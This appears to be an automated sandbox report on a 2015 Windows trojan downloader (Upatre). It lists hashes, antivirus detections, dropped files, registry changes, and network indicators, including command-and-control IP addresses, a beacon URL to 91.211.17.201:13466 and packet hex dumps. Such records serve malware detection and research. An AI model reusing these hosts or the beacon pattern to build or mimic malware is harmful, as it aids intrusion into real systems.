Analysis Date2015-08-10 14:31:38
MD56c735c2114a2b6973dcda50fe55fc104
SHA13728b6a8d3e6e901d88524c40ff28fbe0140a638

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 191674926a8b01849779df89974c9376 sha1: 60370603e262090911189badec69e3977a1ce739 size: 8704
Section.rdata md5: 64d0ee179272f58bee0982d8a62a2840 sha1: 5914df5c2d3f681337ecbb97aef70230e3398829 size: 4096
Section.data md5: df1e9cab01d1e0fba3b2e7ce9044dbaa sha1: 99140dfb4f6c1ea2cbc54b88ab18e535cb498b8e size: 1024
Section.rsrc md5: 926804f63b74fc827bd9d46f493e08dc sha1: 2e57a470ebddbea78e103df5d289a788afe1f8ef size: 20480
Timestamp2014-07-14 05:36:48
PackerMicrosoft Visual C++ v6.0
PEhash473bc989fa837248050401ff7aac1b8565daed34
IMPhash9f9e95f9db59de9e95416835d48a17dc
AVSymantecDownloader.Upatre!gen5
AVMicroWorld (escan)Trojan.Upatre.Gen.3
AVAvira (antivir)TR/Yarwi.djamna
AVEset (nod32)Win32/Kryptik.DHFK
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Upatre!rfn
AVIkarusTrojan.Win32.Kadena
AVBitDefenderTrojan.Upatre.Gen.3
AVTwisterTrojanDldr.Upatre.jgz.wenm
AVArcabit (arcavir)Trojan.Upatre.Gen.3
AVAlwil (avast)Dyre-K [Trj]
AVFortinetW32/Kryptik.DIRZ!tr
AVPadvishno_virus
AVTrend MicroTROJ_UPATRE.SM05
AVEmsisoftTrojan.Upatre.Gen.3
AVMalwareBytesTrojan.Upatre
AVK7Trojan-Downloader ( 004c16281 )
AVGrisoft (avg)Generic_s.EPS
AVAd-AwareTrojan.Upatre.Gen.3
AVRisingTrojan.Win32.Kryptik.af
AVDr. WebTrojan.DownLoader13.9549
AVMcafeeDownloader-FASG!6C735C2114A2
AVCA (E-Trust Ino)no_virus
AVVirusBlokAda (vba32)TrojanDownloader.Upatre
AVFrisk (f-prot)W32/Dalexis.H.gen!Eldorado
AVClamAVno_virus
AVBullGuardTrojan.Upatre.Gen.3
AVCAT (quickheal)Trojan.Kadena.B4
AVKasperskyTrojan-Downloader.Win32.Upatre.jgz
AVZillya!Downloader.CTBLocker.Win32.23
AVF-SecureTrojan.Upatre.Gen.3
AVAuthentiumW32/Dalexis.H.gen!Eldorado

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\xov1795.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\xoveere.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\xoveere.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\xoveere.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\icanhazip[1].htm
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\malware.exe
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS38.124.61.144
Winsock DNS37.57.144.177
Winsock DNS38.124.74.82
Winsock DNS38.124.75.146
Winsock DNS188.255.152.164
Winsock DNS216.245.211.242
Winsock DNS188.255.172.200
Winsock DNS38.124.60.223
Winsock DNS176.36.251.208
Winsock DNS38.124.75.227
Winsock DNS188.255.142.250
Winsock DNSicanhazip.com
Winsock DNS91.211.17.201
Winsock DNS178.214.221.89
Winsock DNS188.255.148.254
Winsock DNS188.255.134.177
Winsock DNS38.124.74.232
Winsock DNS71.45.80.25
Winsock DNS188.255.186.193

Network Details:

DNSicanhazip.com
Type: A
104.238.141.75
DNSicanhazip.com
Type: A
104.238.136.31
DNSicanhazip.com
Type: A
104.238.145.30
HTTP GEThttp://icanhazip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
HTTP GEThttp://91.211.17.201:13466/MOUSE12/COMPUTER-XXXXXX/0/51-SP3/0/
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
Flows TCP192.168.1.1:1031 ➝ 104.238.141.75:80
Flows TCP192.168.1.1:1032 ➝ 91.211.17.201:13466
Flows TCP192.168.1.1:1033 ➝ 38.124.60.223:443
Flows TCP192.168.1.1:1034 ➝ 38.124.60.223:443
Flows TCP192.168.1.1:1035 ➝ 38.124.60.223:443
Flows TCP192.168.1.1:1036 ➝ 38.124.60.223:443
Flows TCP192.168.1.1:1037 ➝ 38.124.61.144:443
Flows TCP192.168.1.1:1038 ➝ 38.124.61.144:443
Flows TCP192.168.1.1:1039 ➝ 38.124.61.144:443
Flows TCP192.168.1.1:1040 ➝ 38.124.74.232:443
Flows TCP192.168.1.1:1041 ➝ 38.124.74.232:443
Flows TCP192.168.1.1:1042 ➝ 38.124.74.82:443
Flows TCP192.168.1.1:1043 ➝ 38.124.74.82:443
Flows TCP192.168.1.1:1044 ➝ 38.124.75.146:443
Flows TCP192.168.1.1:1045 ➝ 38.124.75.146:443
Flows TCP192.168.1.1:1046 ➝ 38.124.75.146:443
Flows TCP192.168.1.1:1047 ➝ 38.124.75.227:443
Flows TCP192.168.1.1:1048 ➝ 38.124.75.227:443
Flows TCP192.168.1.1:1049 ➝ 188.255.134.177:443
Flows TCP192.168.1.1:1050 ➝ 188.255.134.177:443
Flows TCP192.168.1.1:1051 ➝ 188.255.172.200:443
Flows TCP192.168.1.1:1052 ➝ 188.255.172.200:443
Flows TCP192.168.1.1:1053 ➝ 188.255.186.193:443
Flows TCP192.168.1.1:1054 ➝ 188.255.186.193:443
Flows TCP192.168.1.1:1055 ➝ 188.255.142.250:443
Flows TCP192.168.1.1:1056 ➝ 188.255.142.250:443
Flows TCP192.168.1.1:1057 ➝ 188.255.142.250:443
Flows TCP192.168.1.1:1058 ➝ 188.255.148.254:443
Flows TCP192.168.1.1:1059 ➝ 188.255.148.254:443
Flows TCP192.168.1.1:1060 ➝ 188.255.152.164:443
Flows TCP192.168.1.1:1061 ➝ 188.255.152.164:443
Flows TCP192.168.1.1:1062 ➝ 178.214.221.89:443
Flows TCP192.168.1.1:1063 ➝ 178.214.221.89:443
Flows TCP192.168.1.1:1064 ➝ 178.214.221.89:443
Flows TCP192.168.1.1:1065 ➝ 178.214.221.89:443
Flows TCP192.168.1.1:1066 ➝ 216.245.211.242:443
Flows TCP192.168.1.1:1067 ➝ 216.245.211.242:443
Flows TCP192.168.1.1:1068 ➝ 216.245.211.242:443
Flows TCP192.168.1.1:1069 ➝ 216.245.211.242:443
Flows TCP192.168.1.1:1070 ➝ 37.57.144.177:443
Flows TCP192.168.1.1:1071 ➝ 37.57.144.177:443
Flows TCP192.168.1.1:1072 ➝ 37.57.144.177:443
Flows TCP192.168.1.1:1073 ➝ 37.57.144.177:443
Flows TCP192.168.1.1:1074 ➝ 71.45.80.25:443
Flows TCP192.168.1.1:1075 ➝ 71.45.80.25:443
Flows TCP192.168.1.1:1076 ➝ 71.45.80.25:443
Flows TCP192.168.1.1:1077 ➝ 71.45.80.25:443
Flows TCP192.168.1.1:1078 ➝ 176.36.251.208:443
Flows TCP192.168.1.1:1079 ➝ 176.36.251.208:443

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   41636365 70743a20 74657874 2f2a2c20   Accept: text/*, 
0x00000020 (00032)   6170706c 69636174 696f6e2f 2a0d0a55   application/*..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f35 2e302028 57696e64 6f777320   la/5.0 (Windows 
0x00000050 (00080)   4e542036 2e313b20 72763a33 342e3029   NT 6.1; rv:34.0)
0x00000060 (00096)   20476563 6b6f2f32 30313030 31303120    Gecko/20100101 
0x00000070 (00112)   46697265 666f782f 33342e30 0d0a486f   Firefox/34.0..Ho
0x00000080 (00128)   73743a20 6963616e 68617a69 702e636f   st: icanhazip.co
0x00000090 (00144)   6d0d0a43 61636865 2d436f6e 74726f6c   m..Cache-Control
0x000000a0 (00160)   3a206e6f 2d636163 68650d0a 0d0a       : no-cache....

0x00000000 (00000)   47455420 2f4d4f55 53453132 2f434f4d   GET /MOUSE12/COM
0x00000010 (00016)   50555445 522d5858 58585858 2f302f35   PUTER-XXXXXX/0/5
0x00000020 (00032)   312d5350 332f302f 20485454 502f312e   1-SP3/0/ HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f35 2e302028 57696e64   ozilla/5.0 (Wind
0x00000050 (00080)   6f777320 4e542036 2e313b20 72763a33   ows NT 6.1; rv:3
0x00000060 (00096)   342e3029 20476563 6b6f2f32 30313030   4.0) Gecko/20100
0x00000070 (00112)   31303120 46697265 666f782f 33342e30   101 Firefox/34.0
0x00000080 (00128)   0d0a486f 73743a20 39312e32 31312e31   ..Host: 91.211.1
0x00000090 (00144)   372e3230 313a3133 3436360d 0a436163   7.201:13466..Cac
0x000000a0 (00160)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000b0 (00176)   61636865 0d0a0d0a                     ache....

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.


Strings